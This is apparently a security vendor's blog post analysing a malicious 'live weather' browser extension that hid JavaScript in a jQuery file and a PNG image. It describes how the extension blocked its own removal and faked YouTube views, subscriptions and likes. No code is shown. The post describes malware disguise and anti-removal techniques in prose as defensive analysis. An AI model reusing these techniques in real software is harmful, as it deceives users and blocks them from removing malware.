Ominous “Live Weather” Browser Extension Manipulates Users’ Browsing

Malicious Extension
Share Button

The “Colombia Weather Live” extension appeared on multiple browsers, including Google Chrome and Mozilla Firefox, and was downloaded by more than 10,000 users. In the video, we talked about the main actions of the attack: use those browsers to perform actions on YouTube in the background, and prevent users from taking actions to remove the malicious extension from their computer.

Let’s look at how the extension is able to do this.

 

Code Analysis

When we unpack the extension, the first thing we see is that it requires unusual permissions from the user, such access to storage, tabs, and all URLs, which allow the code to know exactly what sites a user is accessing. These are the two files that are responsible for setting off the infection:

  1. 1499654451774.js

At first, this looks like a simple jQuery JavaScript Library, but it is actually embedded with malicious code. It operates in a very simple manner: when called, it loads a PNG image into the browser.

  1. 1499654451774_512.png

The image, loaded by the previous code, seems inoffensive. However, it is actually infected with malicious JavaScript that is executed when the image is loaded onto the page (see Figure 1).

Malicious Extension
Figure 1. PNG Image infected with malicious code

When the code is loaded, it makes a request to retrieve the main Payload – a file that is completely encrypted, as one would expect. However, with some modifications, we were able to decrypt the script and retrieve the actual code.

It is clear that the code was built strategically – the developer even included “Development” and “Production” configurations:

Malicious Extension
Figure 2. Dev and prod configurations

Moving ahead in the code, we find the starting point. It calls four separate functions, but we’re only going to focus on two:

Malicious Extension
Figure 3. Start point of the malicious code

initJsPagesInjecter

This function adds a listener into browser tabs, essentially checking everything that a user attempts to access, and blocking certain activities based on specific URLs and keywords.

This is the part of the code that makes the extension highly difficult to remove. It blocks access to “chrome://extensions” as well as any searches related to anti-virus solutions, preventing users from finding information on how to remove the threat.

 

initMiner

This function initializes some variables and calls the init, which in turn downloads an encrypted JSON that contains instructions for the actions that the script will take.

Malicious Extension
Figure 4. Snippet of a decrypted “Actions” file

When we decrypt the downloaded file, we can see the three data variables that each action contains:

  • _id: Action identifier, used in the activity log for control;
  • type: Type of the action;
  • data: Data required to perform the action.

This large list will be used for the “handleActionsType” function, which calls for the different types of actions:

Malicious Extension
Figure 5. The function that handles the actions.

In this version of the extension, there are calls for these actions:

  • YouTube video rate;
  • YouTube channel subscribe;
  • YouTube comment rate up;
  • YouTube video watch.

Conclusion

The code in this extension is not currently written to cause any lasting harm to users. However, the code was written to be versatile and adaptable, meaning that it would be possible to change its functions without too much extra effort. This is dangerous, as it could be programmed to perform acts such as redirection to phishing sites, credential harvesting, and more. The consequences of a malicious extension with those abilities would be much more severe – compromise of sensitive data, financial loss, and reputational damage to companies being impersonated by fake, malicious extensions, just to name a few.

It is important for organizations to take steps to protect their brand online. The Google Play Store took 3 weeks to recognize “Colombian Weather Live” as a malicious extension, and it was downloaded by many users during that time. If your organization is targeted by a malicious extension, it could be you and users, and your reputation, at risk.

To find out how you can take a proactive stance against brand impersonation, click here.

 

Related Posts

AI vs AI – Can Predictive Models Stop the Tide of Hacker AI? Long ago, the introduction of the internet moved crime from physical to digital locations, where anti-fraud actors play a high-stakes game of detection and prevention, always working to stay one step ahead of fraudsters.
With Tax Season Here, Scams Kick into High Gear As tax season rolls upon us yet again, businesses are increasingly becoming the target of scammers thanks to the massive amounts of sensitive data they hold

Leave a Reply

Your email address will not be published. Required fields are marked *